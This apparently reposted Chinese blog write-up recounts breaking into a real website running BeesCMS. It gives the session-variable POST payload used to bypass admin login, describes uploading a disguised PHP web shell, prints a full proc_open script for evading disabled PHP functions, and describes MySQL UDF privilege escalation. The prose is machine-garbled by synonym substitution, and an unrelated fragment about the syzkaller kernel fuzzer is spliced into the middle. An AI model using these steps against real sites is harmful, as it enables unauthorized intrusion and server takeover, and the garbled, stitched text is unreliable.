记一次提至Administrator权限实战 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

记一次提至Administrator权限实战

申博_安全预警 申博 92次浏览 已收录 0个评论

择要:这是一次发掘cms通用破绽时发明的网站,技术含量虽然不是很高,然则也拿出来和人人分享一下吧,愿望能给一部分人带来收成。

0x01 进入背景

在经由过程googlehack语法发掘beescms时发明了这个站点
记一次提至Administrator权限实战
应用网上的payload,在/mx_form/mx_form.php?id=12页面运用hackbarPOST以下数据

_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

然后接见/admin便能够直接进入背景

0x02 拿shell

进入背景后在‘增加产物模块’处寻觅到了上传点
记一次提至Administrator权限实战
实验上马,但提醒‘上传图片格式不正确’,因而上传图片马抓包,在repeater里变动后缀为php,然后go
记一次提至Administrator权限实战
依据回显没有看出是不是上传胜利,但也没说失利。经由寻觅在‘上传图片治理’处找到
记一次提至Administrator权限实战
点击图片发明剖析了,直接菜刀衔接,拿到shell

内核破绽发掘手艺系列(4)——syzkaller(1)

前言 syzkaller(https://github.com/google/syzkaller)是google的安全研究人员开发并维护的内核fuzz工具。它主要是用go写的,也有少部分C代码,支持akaros/fuchsia/linux/android/freebsd/netbsd/openbsd/windows等系统,发现的漏洞多达上千。不过它支持最全面的还是linux系统,对其它系统的支持都不同程度差一点,也不支持Darwin/XNU。有研究人员做过移植syzkaller fuzz windows WSL[1]和Darwin/XNU[4]的尝试,也都取得了较好的成果。可以说,syzkaller是当今宇宙最强大的内核fuzz工具了。我们将从整体架构开始,介绍syzkaller一些实现的细节。本文分析的syzkaller版本是开始计划写作这个系列文章时从github下载的当时最新的版本,当读者读到这篇文章时代码肯定已经有了变化,所以文章仅供参考,若有变动之处还需自行分析。 整体架构 下面是官方原理介绍中给的一张图。 syz-manager通过ssh调用syz-fuzzer,syz-fuzzer和syz-manager之间通过RPC进行通信。syz-fuzzer将输入传给syz-executor,从kernel中读取代码覆盖率信息。syz-executor执行syscall系统调用。我们再看一下github上的整体目录。 Godeps目录:go的依赖包管理。 dashboard目录:主要与syzbot有关,syzbot会自动fu

0x03 绕过平安形式

拿到shell后进入终端检察权限,但却发明实行命令失利,能够长途启用了平安形式
记一次提至Administrator权限实战
经由在网上一番查找得出:要找到未禁用的php实行函数。先上传了一个检察phpinfo的剧本,找到已禁用的函数
记一次提至Administrator权限实战
发明proc_open函数未被禁用,因而找到以下php剧本

<?php
    $descriptorspec=array( //这个索引数组用力指定要用proc_open建立的子历程的描述符
        0=>array('pipe','r'), //STDIN
        1=>array('pipe','w'),//STDOUT
        2=>array('pipe','w') //STDERROR
    );
    $handle=proc_open('whoami',$descriptorspec,$pipes,NULL);
    //$pipes中生存的是子历程建立的管道对应到 PHP 这一端的文件指针($descriptorspec指定的)
    if(!is_resource($handle)){
    die('proc_open failed');
    }
    //fwrite($pipes[0],'ipconfig');
    print('stdout:<br/>');
    while($s=fgets($pipes[1])){
    print_r($s);
    }
    print('===========<br/>stderr:<br/>');
    while($s=fgets($pipes[2])){
    print_r($s);
    }
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($handle);
?>

上传后能够实行命令,胜利绕过平安形式
记一次提至Administrator权限实战

0x04 提权

上图能够看出只是iis权限,能做的事很范围,以是要想设施提权。
菜刀中虽然不克不及实行命令,然则能够检察文件,因而找到了数据库配置文件
记一次提至Administrator权限实战
发明是mysql的数据库,想到udf提权,因而上传udf提权剧本(附件中)
记一次提至Administrator权限实战
登录后导出udf便能够实行命令了
记一次提至Administrator权限实战
提权胜利,然则不克不及够增加用户,也不克不及开3389。

结语:愿望途经的列位大佬能够指点迷津,也迎接列位来找我交换讨论,谢谢浏览。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明记一次提至Administrator权限实战
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址